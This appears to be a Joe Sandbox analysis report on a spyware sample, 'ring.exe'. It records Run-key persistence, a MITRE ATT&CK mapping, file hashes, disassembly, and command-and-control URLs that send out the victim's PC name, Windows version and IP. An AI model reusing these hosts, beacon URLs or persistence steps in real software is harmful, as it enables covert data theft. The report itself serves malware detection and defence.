Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Opens network shares

Source: C:\Users\user\Desktop\ring.exe

File opened: \\\VBoxMiniRdrDN

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	12 Process Injection	1 Masquerading	OS Credential Dumping	1 Network Share Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	11 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ring.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Win_24230\ring.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Win_24230\ring.exe	18%	ReversingLabs

Source	Detection	Scanner	Label
http://154.205.156.20/Painel/atualiza_update.php	0%	Avira URL Cloud	safe
http://154.205.156.20/Painel/atualizar_dados.php	0%	Avira URL Cloud	safe
http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Build%2019045%29%20&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A&status=Instalada&ip=8.46.123.75	0%	Avira URL Cloud	safe
http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28B	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
adsklbb.org	24.152.39.13	true	true		unknown
api64.ipify.org	104.237.62.213	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Build%2019045%29%20&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A&status=Instalada&ip=8.46.123.75	false	Avira URL Cloud: safe	unknown
http://api64.ipify.org/?format=text	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://154.205.156.20/Painel/atualizar_dados.php	ring.exe, ring.exe.4.dr	false	Avira URL Cloud: safe	unknown
http://www.indyproject.org/	ring.exe, ring.exe.4.dr	false		high
http://154.205.156.20/Painel/atualiza_update.php	ring.exe, ring.exe.4.dr	false	Avira URL Cloud: safe	unknown
http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28B	ring.exe, 00000004.00000002.2527929541.0000000001ADD000.00000004.00000020.00020000.00000000.sdmp, ring.exe, 00000004.00000002.2529177771.000000000366D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
154.205.156.20	unknown	Seychelles	26484	IKGUL-26484US	false
104.237.62.213	api64.ipify.org	United States	18450	WEBNXUS	false
24.152.39.13	adsklbb.org	unknown	270564	MasterDaWebBR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1558818
Start date and time:	2024-11-19 20:35:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ring.exe
Detection:	MAL
Classification:	mal84.spyw.evad.winEXE@9/9@2/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ring.exe, PID 6300 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: ring.exe

Simulations

Behavior and APIs

Time	Type	Description
14:36:15	API Interceptor	17x Sleep call for process: powershell.exe modified
14:36:16	API Interceptor	1x Sleep call for process: ring.exe modified
20:36:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WinSesp C:\Users\user\AppData\Roaming\Win_24230\ring.exe
20:36:28	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WinSesp C:\Users\user\AppData\Roaming\Win_24230\ring.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.237.62.213	http://ERICADLERCLOTHING.com	Get hash	malicious	Unknown	Browse
	sqlite.dll	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse
	9poHPPZxlB.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse
	PM7K6PbAf0.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Neoreklami, PureLog Stealer, RedLine, Stealc	Browse
	FileApp.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig, zgRAT	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api64.ipify.org	http://ERICADLERCLOTHING.com	Get hash	malicious	Unknown	Browse	104.237.62.213
	d1bc91bd44a0.exe	Get hash	malicious	PrivateLoader, Stealc, Vidar	Browse	173.231.16.77
	file.exe	Get hash	malicious	RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	173.231.16.77
	sqlite.dll	Get hash	malicious	Unknown	Browse	104.237.62.213
	66fb252fe232b_Patksl.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	173.231.16.77
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	173.231.16.77
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.237.62.213
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz	Browse	173.231.16.77
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz	Browse	173.231.16.77
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.237.62.213

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MasterDaWebBR	Reservation Detail Booking.com ID4336.vbs	Get hash	malicious	AsyncRAT, PureLog Stealer, zgRAT	Browse	24.152.39.120
	image.ps1	Get hash	malicious	AsyncRAT, PureLog Stealer, zgRAT	Browse	24.152.39.120
	17305370450a724087c7f6981143cf069ec0c685c80f69cbd81880d785e4b0d131e53bb2a9297.dat-decoded.exe	Get hash	malicious	Njrat	Browse	24.152.38.77
	17305370457af8060c5c3c6d7e83c17b8f6083a3c41c5dd21323a637c4bf05d8d8bd79484b331.dat-decoded.exe	Get hash	malicious	Njrat	Browse	24.152.38.77
	2ktrFR0W3v.exe	Get hash	malicious	Clipboard Hijacker, Quasar	Browse	24.152.39.227
	DZNtmwlTFY.exe	Get hash	malicious	Njrat	Browse	24.152.39.227
	j84mNh4z90.exe	Get hash	malicious	Njrat	Browse	24.152.39.227
	xtuHcaTJtwiA.exe	Get hash	malicious	Remcos	Browse	24.152.37.147
	zfT2dBXgtH.elf	Get hash	malicious	Mirai, Okiru	Browse	24.152.39.205
	SYYMW2Y7m2.elf	Get hash	malicious	Mirai, Okiru	Browse	24.152.39.205
IKGUL-26484US	HZ1ZzlIpm7.vbe	Get hash	malicious	FormBook	Browse	198.44.251.205
	mpsl.elf	Get hash	malicious	Mirai	Browse	156.238.135.134
	dvwkja7.elf	Get hash	malicious	Mirai	Browse	154.90.25.186
	ppc.elf	Get hash	malicious	Mirai	Browse	156.231.181.91
	tarm7.elf	Get hash	malicious	Mirai	Browse	156.231.181.98
	tmips.elf	Get hash	malicious	Mirai	Browse	156.231.181.43
	PO_11000262.vbs	Get hash	malicious	FormBook	Browse	198.44.251.51
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	156.249.231.105
	nullnet_load.spc.elf	Get hash	malicious	Mirai	Browse	156.238.135.144
	nullnet_load.x86.elf	Get hash	malicious	Mirai	Browse	156.249.132.14
WEBNXUS	https://hacktools.sh/	Get hash	malicious	Unknown	Browse	107.182.163.162
	http://tvdseo.com	Get hash	malicious	Unknown	Browse	107.182.163.162
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	142.4.54.171
	sora.mips.elf	Get hash	malicious	Mirai	Browse	192.69.213.181
	a.hta	Get hash	malicious	DarkComet, DarkTortilla, Neshta	Browse	216.158.90.138
	http://ERICADLERCLOTHING.com	Get hash	malicious	Unknown	Browse	104.237.62.213
	https://attservicesinc.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	67.220.226.233
	https://www.mediafire.com/file/dl1ll51b96z8hcb/paginas_para_descargar_Vectores_gratis_2018.zip/file	Get hash	malicious	Unknown	Browse	67.220.228.201
	gkjeNrdkot.elf	Get hash	malicious	Mirai	Browse	64.185.231.196
	d1bc91bd44a0.exe	Get hash	malicious	PrivateLoader, Stealc, Vidar	Browse	173.231.16.77

Process:	C:\Users\user\Desktop\ring.exe
File Type:	Unicode text, UTF-8 text, with no line terminators
Category:	dropped
Size (bytes):	200
Entropy (8bit):	5.103507445471441
Encrypted:	false
SSDEEP:	3:ocsHUq8dUV2hcFfL8/jBK8hv1xu9wr0qpE11MGNstDUrZOFdNIAzXPCTK/1VWC:oHW9hcxLs9vHFrRqCwZOFPIAzXIel
MD5:	22868ABF80E396FB8A7C5F27A82A2C4E
SHA1:	398C626F408A701A3B83A97C6555E7F26ECBA1DD
SHA-256:	FDCC20DF3C1D998528B44D2FE027B492BA0206CAAD704E719946F9DF44E86499
SHA-512:	866347B8E2C7B04D8FE27433D4389B780591F65102F4E30A1DDFE545BE17E7B976907C9C8496D8CA2EE5A056711C6734FBB1E2E3A8761285E1B9E6D607DA18D8
Malicious:	false
Reputation:	low
Preview:	Dados Recebidos:<br>Nome do PC: 960781<br>Vers.o do Windows: Windows 10.0 (Build 19045) <br>.ltima Atualiza..o: 2024-11-19<br>Status: Instalada<br>Dados salvos com sucesso no arquivo desktops.txt!

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380747059108785
Encrypted:	false
SSDEEP:	48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZSUyus:lGLHxvIIwLgZ2KRHWLOugEs
MD5:	98BD0A3DBC29BD9486474C3069740CE0
SHA1:	D2D2389EC77D5C090CB7A232747C1E74CD2F3346
SHA-256:	0BDF783C058C98376CF0951AEB1A960CD03118E836EAFE4977BB5B616AB368E9
SHA-512:	17B166F024D169FDF4F7F5AC95A53A1380E625B496A0CA04392A7E2538D73F3F8FB70585C6CFC0DA05CD50B45EDDC7B04321B3816D39FE4261F547D6FA900CDC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1n4c2z4z.3uk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kecezh5z.vbm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndwve3xd.53z.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opwuol2n.wsj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Win_24230\ring.exe

Download File

Process:	C:\Users\user\Desktop\ring.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17488384
Entropy (8bit):	4.786504001985185
Encrypted:	false
SSDEEP:	49152:3h+ZMbgw1VoIj5CSYS9o9IpHiYXcaXoMx+q2zAkcq085zXnCC7CWRUFGwhnb1b:3h+ZYD5DXc6oMx7CAkL0iz3T8T1b
MD5:	DEC85DE31C5A9E3754AB0FCFED8A3E79
SHA1:	B47C8F4918518F1538842B5B12BC5DCBEA5C3D59
SHA-256:	FA4F6DA9EA8ACA025D129328CE57B36343A1BC8796D1846D02157D2242F904A8
SHA-512:	34831FF6C2571F0354BD5958A036A0030C85CAB0C6DCB47C881CB366A47ADF20741D6A473BE369C20A1535FDE380F0BE6BC53C5EDB96D4729A92D4BBF47BF0AA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....<g.................XJ..~......TrJ.......J...@.......................................@......@....................L.m....0L..;...@S..v....................L.$.............................L.....................x:L.8....pL......................text....#J......$J................. ..`.itext...2...@J..4...(J............. ..`.data....*....J..,...\J.............@....bss.....{....K..........................idata...;...0L..<....K.............@....didata......pL.......K.............@....edata..m.....L.......K.............@..@.tls....X.....L..........................rdata..].....L.......K.............@..@.reloc..$.....L.......K.............@..B.rsrc....v...@S..v...dR.............@..@....................................@..@................

C:\Users\user\AppData\Roaming\Win_24230\ring.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\ring.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\att.txt

Download File

Process:	C:\Users\user\Desktop\ring.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	12
Entropy (8bit):	2.8553885422075336
Encrypted:	false
SSDEEP:	3:tR6r:k
MD5:	2859916D3768B8859995F1AB7D03A74C
SHA1:	0531F9B1D851BBA2E56C3DDC8B2B173C30E5117F
SHA-256:	AC19D06F24FE1D63584CA24CF2F30F99A45AE7AFC9AFC9A2F58754B19AC175CD
SHA-512:	F26287C42157ED198417540B90685C008B15E127BF48117922BDFA8DD42A4A0489D72F11DAC89F22685021C625BF257D430A3901AFB72DF78381E3FEEB1C12AE
Malicious:	false
Preview:	2024-11-19..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.786504001985185
TrID:	Win32 Executable (generic) a (10002005/4) 98.45% Inno Setup installer (109748/4) 1.08% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	ring.exe
File size:	17'488'384 bytes
MD5:	dec85de31c5a9e3754ab0fcfed8a3e79
SHA1:	b47c8f4918518f1538842b5b12bc5dcbea5c3d59
SHA256:	fa4f6da9ea8aca025d129328ce57b36343a1bc8796d1846d02157d2242f904a8
SHA512:	34831ff6c2571f0354bd5958a036a0030c85cab0c6dcb47c881cb366a47adf20741d6a473be369c20a1535fde380f0be6bc53c5edb96d4729a92d4bbf47bf0aa
SSDEEP:	49152:3h+ZMbgw1VoIj5CSYS9o9IpHiYXcaXoMx+q2zAkcq085zXnCC7CWRUFGwhnb1b:3h+ZYD5DXc6oMx7CAkL0iz3T8T1b
TLSH:	2907B20A594AD025D6E10FF6E835F29CD826FF381B94842D45523ABA49F34E12D2EF37
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	1c0d51316e630605

Static PE Info

General

Entrypoint:	0x8a7254
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x673CD9EA [Tue Nov 19 18:33:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	5d836336e2a3e8a72b29dc47ad486ef9

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
mov eax, 00896CA8h
call 00007FB1D43B9E58h
mov ebx, dword ptr [008BA2B8h]
mov eax, dword ptr [ebx]
call 00007FB1D45C856Bh
mov eax, dword ptr [ebx]
xor edx, edx
call 00007FB1D45CA54Eh
mov eax, dword ptr [ebx]
mov byte ptr [eax+6Fh], 00000000h
mov ecx, dword ptr [008BA7D0h]
mov eax, dword ptr [ebx]
mov edx, dword ptr [008903C8h]
call 00007FB1D45C8561h
mov ecx, dword ptr [008BA154h]
mov eax, dword ptr [ebx]
mov edx, dword ptr [0088F6A4h]
call 00007FB1D45C854Eh
mov eax, dword ptr [ebx]
call 00007FB1D45C86A7h
pop ebx
call 00007FB1D43B1F8Dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
